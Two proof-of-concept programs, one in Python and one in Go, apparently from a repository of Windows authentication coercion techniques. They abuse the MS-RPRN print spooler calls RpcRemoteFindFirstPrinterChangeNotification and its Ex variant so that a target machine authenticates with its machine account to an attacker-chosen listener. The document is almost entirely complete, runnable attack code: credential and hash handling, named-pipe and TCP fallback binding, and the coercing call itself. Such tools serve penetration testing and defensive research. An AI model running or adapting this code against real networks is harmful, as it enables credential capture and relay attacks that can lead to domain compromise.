File: methods/MS-RPRN - Print System Remote Protocol/62. Remote call to RpcRemoteFindFirstPrinterChangeNotification (opnum 62)/poc/python/coerce_poc.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : coerce_poc.py
# Author             : Podalirius (@podalirius_)
# Date created       : 9 Jul 2022

import sys
import argparse
from impacket import system_errors
from impacket.dcerpc.v5 import transport, epm, rprn
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT, NDRPOINTER, NDRUniConformantArray
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
from impacket.uuid import uuidtup_to_bin


class DCERPCSessionError(DCERPCException):
    def __init__(self, error_string=None, error_code=None, packet=None):
        DCERPCException.__init__(self, error_string, error_code, packet)

    def __str__(self):
        key = self.error_code
        if key in system_errors.ERROR_MESSAGES:
            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
            return 'SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
        else:
            return 'SessionError: unknown error code: 0x%x' % self.error_code


class BYTE_ARRAY(NDRUniConformantArray):
    item = 'c'


class PBYTE_ARRAY(NDRPOINTER):
    referent = (
        ('Data', BYTE_ARRAY),
    )


class RpcRemoteFindFirstPrinterChangeNotification(NDRCALL):
    # impacket only implements the Ex variant (opnum 65), so this call is declared here
    # from the IDL of [MS-RPRN] 3.1.4.10.3 RpcRemoteFindFirstPrinterChangeNotification.
    opnum = 62
    structure = (
        ('hPrinter', rprn.PRINTER_HANDLE), # Type: PRINTER_HANDLE
        ('fdwFlags', DWORD),               # Type: DWORD
        ('fdwOptions', DWORD),             # Type: DWORD
        ('pszLocalMachine', LPWSTR),       # Type: wchar_t *
        ('dwPrinterLocal', DWORD),         # Type: DWORD
        ('cbBuffer', DWORD),               # Type: DWORD
        ('pBuffer', PBYTE_ARRAY),          # Type: BYTE *
    )


class RpcRemoteFindFirstPrinterChangeNotificationResponse(NDRCALL):
    structure = ()


class RPCProtocol(object):
    """
    Documentation for class RPCProtocol
    """

    uuid = None
    version = None
    pipe = None

    ncan_target = None
    __rpctransport = None
    dce = None
    target = None

    def __init__(self):
        super(RPCProtocol, self).__init__()

    def connect(self, username, password, domain, lmhash, nthash, target, dcHost, doKerberos=False, targetIp=None):
        self.target = target
        # Since the hardening that followed [MSFT-CVE-2021-34527], the print spooler can be
        # configured to expose its RPC interfaces over TCP only (RpcUseNamedPipeProtocol),
        # and recent Windows versions ship that way: \PIPE\spoolss then does not exist and
        # the named pipe transport fails with STATUS_OBJECT_NAME_NOT_FOUND. Try the
        # documented named pipe first, then ask the endpoint mapper on TCP/135 for the
        # dynamic ncacn_ip_tcp port the interface is registered on.
        #
        # Be aware of what this changes: the callback the target makes follows the protocol
        # sequence of the binding it was asked on. Bound over ncacn_ip_tcp, the target opens
        # its reply binding to the listener over RPC and never touches SMB, so an SMB
        # listener captures nothing. Measured against a Server 2025 DC: the call reaches the
        # spooler and returns RPC_S_SERVER_UNAVAILABLE (0x6ba) once it fails to find a print
        # client on the listener, with no connection on port 445 at all. Coercing SMB
        # authentication needs the named pipe, this fallback is what lets the call be made
        # and diagnosed at all when \\PIPE\\spoolss is gone.
        named_pipe = r'ncacn_np:%s[%s]' % (target, self.pipe)
        if self._connect_binding(named_pipe, username, password, domain, lmhash, nthash, dcHost, doKerberos, targetIp):
            return True

        print("[>] Asking the endpoint mapper of %s for an ncacn_ip_tcp endpoint ... " % target, end="")
        sys.stdout.flush()
        try:
            stringbinding = epm.hept_map(target, uuidtup_to_bin((self.uuid, self.version)), protocol='ncacn_ip_tcp')
        except Exception as e:
            print("\x1b[1;91mfail\x1b[0m")
            print("[!] Something went wrong, check error status => %s" % str(e))
            return False
        print("\x1b[1;92m%s\x1b[0m" % stringbinding)

        return self._connect_binding(stringbinding, username, password, domain, lmhash, nthash, dcHost, doKerberos, targetIp)

    def _connect_binding(self, stringbinding, username, password, domain, lmhash, nthash, dcHost, doKerberos, targetIp):
        self.ncan_target = stringbinding
        self.__rpctransport = transport.DCERPCTransportFactory(self.ncan_target)

        if hasattr(self.__rpctransport, 'set_credentials'):
            self.__rpctransport.set_credentials(
                username=username,
                password=password,
                domain=domain,
                lmhash=lmhash,
                nthash=nthash
            )

        if doKerberos == True:
            self.__rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
        # setRemoteHost belongs to the SMB transport; an ncacn_ip_tcp binding already
        # carries its own host and port.
        if targetIp is not None and hasattr(self.__rpctransport, 'setRemoteHost'):
            self.__rpctransport.setRemoteHost(targetIp)

        self.dce = self.__rpctransport.get_dce_rpc()
        self.dce.set_auth_type(RPC_C_AUTHN_WINNT)
        self.dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)

        print("[>] Connecting to %s ... " % self.ncan_target, end="")
        sys.stdout.flush()
        try:
            self.dce.connect()
        except Exception as e:
            print("\x1b[1;91mfail\x1b[0m")
            print("[!] Something went wrong, check error status => %s" % str(e))
            return False
        else:
            print("\x1b[1;92msuccess\x1b[0m")

        print("[>] Binding to <uuid='%s', version='%s'> ... " % (self.uuid, self.version), end="")
        sys.stdout.flush()
        try:
            self.dce.bind(uuidtup_to_bin((self.uuid, self.version)))
        except Exception as e:
            print("\x1b[1;91mfail\x1b[0m")
            print("[!] Something went wrong, check error status => %s" % str(e))
            return False
        else:
            print("\x1b[1;92msuccess\x1b[0m")

        return True


class MS_RPRN(RPCProtocol):
    uuid = "12345678-1234-abcd-ef00-0123456789ab"
    version = "1.0"
    pipe = r"\PIPE\spoolss"

    def RpcRemoteFindFirstPrinterChangeNotification(self, listener):
        if self.dce is not None:
            print("[>] Calling RpcRemoteFindFirstPrinterChangeNotification() ...")
            try:
                # The notification call needs a printer or server handle, so open the
                # target's print server object first (RpcOpenPrinter, opnum 1).
                resp = rprn.hRpcOpenPrinter(self.dce, '\\\\%s\x00' % self.target)

                request = RpcRemoteFindFirstPrinterChangeNotification()
                request['hPrinter'] = resp['pHandle']
                request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
                request['fdwOptions'] = 0
                # The coerced argument: the server calls RpcReplyOpenPrinter back on this
                # machine name, authenticating to it ([MS-RPRN] 3.1.4.10.3).
                request['pszLocalMachine'] = '\\\\%s\x00' % listener
                request['dwPrinterLocal'] = 0
                # cbBuffer SHOULD be zero when sent and pBuffer MUST be NULL ([MS-RPRN] 3.1.4.10.3).
                request['cbBuffer'] = 0
                request['pBuffer'] = NULL
                # request.dump()
                resp = self.dce.request(request)
            except Exception as e:
                print(e)
        else:
            print("[!] Error: dce is None, you must call connect() first.")


if __name__ == '__main__':
    print("Windows auth coerce using MS-RPRN::RpcRemoteFindFirstPrinterChangeNotification()\n")
    parser = argparse.ArgumentParser(add_help=True, description="Proof of concept for coercing authentication with MS-RPRN::RpcRemoteFindFirstPrinterChangeNotification()")

    parser.add_argument("-u", "--username", default="", help="Username to authenticate to the endpoint.")
    parser.add_argument("-p", "--password", default="", help="Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified)")
    parser.add_argument("-d", "--domain", default="", help="Windows domain name to authenticate to the endpoint.")
    parser.add_argument("--hashes", action="store", metavar="[LMHASH]:NTHASH", help="NT/LM hashes (LM hash can be empty)")
    parser.add_argument("--no-pass", action="store_true", help="Don't ask for password (useful for -k)")
    parser.add_argument("-k", "--kerberos", action="store_true", help="Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line")
    parser.add_argument("--dc-ip", action="store", metavar="ip address", help="IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter")
    parser.add_argument("--target-ip", action="store", metavar="ip address", help="IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it")

    parser.add_argument("listener", help="IP address or hostname of listener")
    parser.add_argument("target", help="IP address or hostname of target")

    options = parser.parse_args()

    if options.hashes is not None:
        lmhash, nthash = options.hashes.split(':')
    else:
        lmhash, nthash = '', ''

    if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
        from getpass import getpass

        options.password = getpass("Password:")

    protocol = MS_RPRN()

    connected = protocol.connect(
        username=options.username,
        password=options.password,
        domain=options.domain,
        lmhash=lmhash,
        nthash=nthash,
        target=options.target,
        doKerberos=options.kerberos,
        dcHost=options.dc_ip,
        targetIp=options.target_ip
    )

    if connected:
        protocol.RpcRemoteFindFirstPrinterChangeNotification(options.listener)

    sys.exit()

File: methods/MS-RPRN - Print System Remote Protocol/65. Remote call to RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65)/poc/go/coerce_poc.go
// File name          : coerce_poc.go
// Author             : Podalirius (@podalirius_)
// Date created       : 10 Sep 2026
//
// Proof of concept for coercing authentication with MS-RPRN::RpcRemoteFindFirstPrinterChangeNotificationEx()
// (opnum 65), written with the TheManticoreProject libraries:
//
//   - github.com/TheManticoreProject/goopts    for the command line parsing
//   - github.com/TheManticoreProject/Manticore for SMB, DCE/RPC and the RPC interface
//
// The call takes a printer handle, so it is a two-call coercion on one association:
// RpcOpenPrinter (opnum 1) opens the print server object of the target, then
// RpcRemoteFindFirstPrinterChangeNotificationEx is told that the "local machine" to send
// change notifications to is \\<listener>. The spooler resolves that server name over
// SMB, and authenticates to the listener with the machine account while doing so.
//
// Run it from this directory (go.mod pins the libraries):
//
//	go run coerce_poc.go --target 192.168.1.30 --listener 192.168.1.10 -d LAB.local -u user -p 'password'
//
// or build a standalone binary with:
//
//	go build -o coerce_poc coerce_poc.go
package main

import (
	"fmt"
	"os"
	"strings"

	"github.com/TheManticoreProject/Manticore/logger"
	winspool "github.com/TheManticoreProject/Manticore/network/dcerpc/interfaces/12345678-1234-abcd-ef00-0123456789ab/1.0"
	"github.com/TheManticoreProject/Manticore/network/dcerpc/interfaces/12345678-1234-abcd-ef00-0123456789ab/1.0/functions"
	"github.com/TheManticoreProject/Manticore/network/dcerpc/ms-protocols/msproto"
	"github.com/TheManticoreProject/Manticore/network/dcerpc/ndr"
	"github.com/TheManticoreProject/Manticore/network/dcerpc/syntax"
	dcerpcclient "github.com/TheManticoreProject/Manticore/network/dcerpc/v5/client"
	"github.com/TheManticoreProject/Manticore/network/dcerpc/v5/pdu"
	smbclient "github.com/TheManticoreProject/Manticore/network/smb/client"
	"github.com/TheManticoreProject/Manticore/windows/credentials"
	"github.com/TheManticoreProject/Manticore/windows/guid"
	msrprn "github.com/TheManticoreProject/Manticore/windows/protocols/ms-rprn"
	"github.com/TheManticoreProject/goopts/parser"
	"golang.org/x/term"
)

var (
	// Configuration
	debug bool

	// Network settings
	target     string
	targetPort int
	pipeName   string

	// Coercion settings
	listener string

	// Authentication details
	authDomain   string
	authUsername string
	authPassword string
	authHashes   string
	authNoPass   bool
)

func parseArgs() {
	ap := parser.ArgumentsParser{
		Banner: "Windows auth coerce using MS-RPRN::RpcRemoteFindFirstPrinterChangeNotificationEx() - by Remi GASCOU (Podalirius) - v1.0.0",
	}

	ap.SetOptShowBannerOnHelp(true)
	ap.SetOptShowBannerOnRun(true)

	ap.NewBoolArgument(&debug, "", "--debug", false, "Enable debug mode.")

	// Network settings
	group_network, err := ap.NewArgumentGroup("Network")
	if err != nil {
		fmt.Printf("[error] Error creating ArgumentGroup: %s\n", err)
	} else {
		group_network.NewStringArgument(&target, "-t", "--target", "", true, "IP address or hostname of the target.")
		group_network.NewTcpPortArgument(&targetPort, "", "--target-port", 445, false, "Port of the SMB service on the target.")
		// The README lists this interface on: \PIPE\spoolss.
		// Manticore's PipeName is the endpoint the protocol documents as its own.
		group_network.NewStringArgument(&pipeName, "", "--pipe", winspool.PipeName, false, "Named pipe to bind the interface on.")
	}

	// Coercion settings
	group_coerce, err := ap.NewArgumentGroup("Coercion")
	if err != nil {
		fmt.Printf("[error] Error creating ArgumentGroup: %s\n", err)
	} else {
		// pszLocalMachine is a server name ([MS-RPRN] 2.2.4.16), so there is no share or
		// file component to configure here: the target is sent "\\<listener>".
		group_coerce.NewStringArgument(&listener, "-l", "--listener", "", true, "IP address or hostname of the listener the target should authenticate to.")
	}

	// Authentication
	group_auth, err := ap.NewArgumentGroup("Authentication")
	if err != nil {
		fmt.Printf("[error] Error creating ArgumentGroup: %s\n", err)
	} else {
		group_auth.NewStringArgument(&authDomain, "-d", "--domain", "", false, "(FQDN) domain to authenticate to.")
		group_auth.NewStringArgument(&authUsername, "-u", "--user", "", false, "User to authenticate as.")
	}

	// Secret
	group_secret, err := ap.NewNotRequiredMutuallyExclusiveArgumentGroup("Secret")
	if err != nil {
		fmt.Printf("[error] Error creating ArgumentGroup: %s\n", err)
	} else {
		group_secret.NewBoolArgument(&authNoPass, "", "--no-pass", false, "Don't ask for a password (null session).")
		group_secret.NewStringArgument(&authPassword, "-p", "--password", "", false, "Password to authenticate with.")
		group_secret.NewStringArgument(&authHashes, "-H", "--hashes", "", false, "NT/LM hashes, format is LMhash:NThash.")
	}

	ap.Parse()
}

// RpcRemoteFindFirstPrinterChangeNotificationEx (opnum 65), as documented by [MS-RPRN]:
//
//	DWORD RpcRemoteFindFirstPrinterChangeNotificationEx(
//	    [in] PRINTER_HANDLE hPrinter,
//	    [in] DWORD fdwFlags,
//	    [in] DWORD fdwOptions,
//	    [in, string, unique] wchar_t* pszLocalMachine,
//	    [in] DWORD dwPrinterLocal,
//	    [in, unique] RPC_V2_NOTIFY_OPTIONS* pOptions
//	);
//
// The binding handle is implicit in Go. The request/response structs below are lifted
// verbatim from Manticore's generated call for this opnum
// (network/dcerpc/interfaces/12345678-1234-abcd-ef00-0123456789ab/1.0/functions/65_RpcRemoteFindFirstPrinterChangeNotificationEx.go), which is the reviewed
// translation of that IDL; the wrapper there folds a nonzero return value into an
// error string, so the call is issued here to keep the numeric status.

// rpcRemoteFindFirstPrinterChangeNotificationExRequest carries the [in] parameters of RpcRemoteFindFirstPrinterChangeNotificationEx.
type rpcRemoteFindFirstPrinterChangeNotificationExRequest struct {
	HPrinter        msrprn.PRINTER_HANDLE
	FdwFlags        ndr.DWORD
	FdwOptions      ndr.DWORD
	PszLocalMachine *ndr.WSTR `ndr:"unique"`
	DwPrinterLocal  ndr.DWORD
	POptions        *msrprn.RPC_V2_NOTIFY_OPTIONS `ndr:"unique"`
}

// rpcRemoteFindFirstPrinterChangeNotificationExResponse carries the [out] parameters and return value of RpcRemoteFindFirstPrinterChangeNotificationEx.
type rpcRemoteFindFirstPrinterChangeNotificationExResponse struct {
	Status ndr.DWORD `ndr:"retval"`
}

func (*rpcRemoteFindFirstPrinterChangeNotificationExRequest) Opnum() uint16 {
	return winspool.OpnumRpcRemoteFindFirstPrinterChangeNotificationEx
}

// printerChangeAddJob is the PRINTER_CHANGE_ADD_JOB Printer Change Value ([MS-RPRN]
// 2.2.4.13), the condition the change notification object is armed on. Its exact value
// does not matter to the coercion, only that fdwFlags is nonzero, which is what makes a
// NULL pOptions legal; PRINTER_CHANGE_ADD_JOB is the flag the Python PoC of this method
// sends (impacket rprn.PRINTER_CHANGE_ADD_JOB).
const printerChangeAddJob ndr.DWORD = 0x00000100

// serverRead is the SERVER_READ access mask requested on the print server object
// (STANDARD_RIGHTS_READ 0x00020000 | SERVER_ACCESS_ENUMERATE 0x00000002). It is the
// access impacket's hRpcOpenPrinter defaults to, so it is what the Python PoC of this
// method asks for, and it is enough to be handed a handle: enumerate access is granted
// to authenticated users, while SERVER_ALL_ACCESS would need print-operator rights.
const serverRead ndr.DWORD = 0x00020002

// win32ErrorNames names the Win32 error codes ([MS-ERREF] 2.2) that this interface returns
// but that Manticore's status table for it does not cover yet. winspool.StatusString is
// always consulted first, so the codes Manticore does define keep their names from there
// and this map only fills the gaps. ERROR_BAD_NETPATH is the one a coercion normally ends
// on: the target could not reach the UNC path — after trying to.
var win32ErrorNames = map[uint32]string{
	0x00000003: "ERROR_PATH_NOT_FOUND",
	0x00000035: "ERROR_BAD_NETPATH",
	0x00000043: "ERROR_BAD_NET_NAME",
	0x0000007b: "ERROR_INVALID_NAME",
}

// statusName resolves a Win32 status code to its constant name, preferring Manticore's
// own table. StatusString falls back to a "0x%08x" rendering for codes it does not know,
// which is how an unknown code is detected here.
func statusName(status uint32) string {
	if name := winspool.StatusString(status); !strings.HasPrefix(name, "0x") {
		return name
	}
	if name, found := win32ErrorNames[status]; found {
		return name
	}
	return "UNKNOWN_ERROR"
}

// formatStatus renders a status as "ERROR_BAD_NETPATH (0x00000035)".
func formatStatus(status uint32) string {
	return fmt.Sprintf("%s (0x%08x)", statusName(status), status)
}

// interfaceSyntaxes returns the abstract syntaxes to try, in order. A protocol may be
// registered under several interface UUIDs and a given Windows version may only expose
// some of them, so a rejected bind is a reason to try the next candidate, not to stop.
func interfaceSyntaxes() []syntax.SyntaxID {
	var _ = guid.FromFormatD // only used when the protocol has several interface UUIDs
	candidates := []syntax.SyntaxID{winspool.SyntaxID()}
	return candidates
}

// promptPassword asks for the password on the terminal, as the Python PoC does when a
// username is given with neither a password, hashes, nor --no-pass.
func promptPassword() (string, error) {
	fmt.Print("Password: ")
	secret, err := term.ReadPassword(int(os.Stdin.Fd()))
	fmt.Println()
	if err != nil {
		return "", err
	}
	return string(secret), nil
}

func main() {
	parseArgs()

	if debug {
		logger.SetLevel(logger.LevelDebug)
	}

	if authUsername != "" && authPassword == "" && authHashes == "" && !authNoPass {
		password, err := promptPassword()
		if err != nil {
			logger.Errorf("Error reading password: %s", err)
			return
		}
		authPassword = password
	}

	creds, err := credentials.NewCredentials(authDomain, authUsername, authPassword, authHashes)
	if err != nil {
		logger.Errorf("Error creating credentials: %s", err)
		return
	}

	// Negotiate the best dialect the target supports (SMB1 or SMB2+), the DCE/RPC
	// named-pipe transport is then the same for the caller either way.
	logger.Infof("Connecting to %s:%d ...", target, targetPort)
	smb, err := smbclient.Dial(target, targetPort, smbclient.Options{})
	if err != nil {
		logger.Errorf("Error connecting to %s:%d: %s", target, targetPort, err)
		return
	}
	defer smb.Disconnect()
	logger.Infof("Connected, negotiated dialect [%s]", smb.Dialect())

	if err := smb.Login(creds); err != nil {
		logger.Errorf("Error authenticating to %s: %s", target, err)
		return
	}
	defer smb.Logoff()
	logger.Infof("Authenticated as [%s]", strings.Trim(authDomain+"\\"+authUsername, "\\"))

	// Named pipes live on the IPC$ tree ([MS-RPCE] 2.1.1.2).
	if err := smb.TreeConnect("IPC$"); err != nil {
		logger.Errorf("Error connecting to share IPC$: %s", err)
		return
	}
	defer smb.TreeDisconnect()

	// A rejected bind leaves the association unusable, so every candidate syntax gets a
	// fresh pipe and client of its own.
	var rpc *dcerpcclient.Client
	closeRPC := func() error { return nil }
	for _, abstractSyntax := range interfaceSyntaxes() {
		transport, err := smb.RPCTransport(pipeName)
		if err != nil {
			// The pipe is missing rather than the bind refused: since the hardening that
			// followed [MSFT-CVE-2021-34527] the spooler can be told to expose its RPC
			// interfaces over TCP only (RpcUseNamedPipeProtocol), and then \PIPE\spoolss
			// does not exist at all. Not fatal here, ncacn_ip_tcp is tried below.
			logger.Warnf("Could not open pipe %s: %s", pipeName, err)
			break
		}

		logger.Infof("Binding to <%s> on %s ...", abstractSyntax, pipeName)
		candidate := dcerpcclient.NewClient(transport)
		// Authenticate at the RPC layer on top of the SMB session: several of these
		// services refuse an anonymously bound association (EFSRPC answers
		// nca_s_fault_access_denied since [MSFT-CVE-2021-43893]). Sign and seal every PDU.
		if err := candidate.SetAuth(pdu.AuthTypeNTLMSSP, pdu.AuthLevelPktPrivacy, creds); err != nil {
			logger.Errorf("Error configuring RPC authentication: %s", err)
			candidate.Close()
			return
		}
		if err := candidate.Bind(abstractSyntax); err != nil {
			logger.Warnf("Bind rejected: %s", err)
			candidate.Close()
			continue
		}
		logger.Info("Bind successful")
		rpc, closeRPC = candidate, candidate.Close
		break
	}
	// Named pipes unavailable: resolve the interface through the endpoint mapper on
	// TCP/135 and bind it over ncacn_ip_tcp instead, which is the only way to reach a
	// spooler that was configured for TCP only.
	//
	// Be aware of what this changes: the callback the target makes follows the protocol
	// sequence of the binding it was asked on. Bound over ncacn_ip_tcp, the target opens
	// its reply binding to the listener over RPC and never touches SMB, so an SMB
	// listener captures nothing. Measured against a Server 2025 DC: the call reaches the
	// spooler and returns RPC_S_SERVER_UNAVAILABLE (0x6ba) once it fails to find a print
	// client on the listener, with no connection on port 445 at all. Coercing SMB
	// authentication needs the named pipe path above; this fallback is what lets the call
	// be made and diagnosed at all when \PIPE\spoolss is gone.
	if rpc == nil {
		for _, abstractSyntax := range interfaceSyntaxes() {
			logger.Infof("Binding to <%s> over ncacn_ip_tcp (endpoint mapper) ...", abstractSyntax)
			candidate, closer, err := msproto.NewTCPBinder(target, 0, creds, 0).Bind(abstractSyntax)
			if err != nil {
				logger.Warnf("Bind over ncacn_ip_tcp failed: %s", err)
				continue
			}
			logger.Info("Bind successful")
			rpc, closeRPC = candidate, closer
			break
		}
	}
	if rpc == nil {
		logger.Errorf("Could not bind the interface on %s nor over ncacn_ip_tcp.", pipeName)
		return
	}
	defer closeRPC()

	// hPrinter is a PRINTER_HANDLE, which only RpcAddPrinter, RpcAddPrinterEx,
	// RpcOpenPrinter or RpcOpenPrinterEx can produce, so the coercion needs a prerequisite
	// call on this same association. RpcOpenPrinter (opnum 1) on the target's own server
	// name hands back a handle to its print server object; the Python PoC of this method
	// does exactly this through impacket's hRpcOpenPrinter, with pDatatype NULL, an empty
	// DEVMODE_CONTAINER (cbBuf 0, pDevMode NULL) and SERVER_READ.
	printerName := ndr.WSTR(fmt.Sprintf(`\\%s`, target))
	logger.Infof("Calling RpcOpenPrinter(PPrinterName='%s') ...", string(printerName))
	printerHandle, err := functions.RpcOpenPrinter(rpc, &printerName, nil, msrprn.DEVMODE_CONTAINER{}, serverRead)
	if err != nil {
		logger.Errorf("RpcOpenPrinter() failed: %s", err)
		return
	}
	logger.Infof("Got a printer handle [%x]", printerHandle[:])

	// The server name the target will resolve, and therefore authenticate to. Unlike the
	// file-path coercions, pszLocalMachine is a machine name ([MS-RPRN] 2.2.4.16): the
	// Python PoC sends "\\<listener>" and nothing more, so this is byte-identical to it
	// (ndr.WSTR appends the NUL terminator the Python PoC has to write out by hand).
	uncPath := fmt.Sprintf(`\\%s`, listener)

	uncPathWSTR := ndr.WSTR(uncPath)
	logger.Infof("Calling RpcRemoteFindFirstPrinterChangeNotificationEx(PszLocalMachine='%s') ...", uncPath)
	request := &rpcRemoteFindFirstPrinterChangeNotificationExRequest{
		HPrinter: printerHandle,
		FdwFlags: printerChangeAddJob,
		// fdwOptions selects the category of printers change notifications are returned
		// for ([MS-RPRN] 2.2.3.8). The Python PoC leaves it at 0 — no category, since the
		// notification back-channel is never opened — and the coercion happens while the
		// spooler resolves pszLocalMachine, before any notification is delivered.
		FdwOptions:      0,
		PszLocalMachine: &uncPathWSTR,
		// dwPrinterLocal is a client-chosen value that lets the client correlate the
		// spooler's RpcReplyOpenPrinter callback with this handle. Nothing here waits for
		// that callback, so 0 is sent, as the Python PoC does.
		DwPrinterLocal: 0,
		// [in, unique] RPC_V2_NOTIFY_OPTIONS*: NULL, which the method's documentation
		// permits because fdwFlags is nonzero. A nil pointer is how a [unique] NULL is
		// marshalled, and it is what the Python PoC passes.
		POptions: nil,
	}
	var response rpcRemoteFindFirstPrinterChangeNotificationExResponse

	if err := rpc.Invoke(request, &response); err != nil {
		// A DCE/RPC fault means the call never reached the method: a wrong interface,
		// endpoint or parameter modelling, not a refusal by the server.
		logger.Errorf("RpcRemoteFindFirstPrinterChangeNotificationEx() faulted: %s", err)
		return
	}

	status := uint32(response.Status)
	if status == winspool.StatusSuccess {
		logger.Infof("RpcRemoteFindFirstPrinterChangeNotificationEx() returned %s, check your listener.", formatStatus(status))
		return
	}
	// Any other status is expected: the target fails on a path it cannot reach, but it has
	// already authenticated to the listener to find that out.
	logger.Infof("RpcRemoteFindFirstPrinterChangeNotificationEx() returned a status: %s", formatStatus(status))
	logger.Info("The call was processed by the target, check your listener.")
}
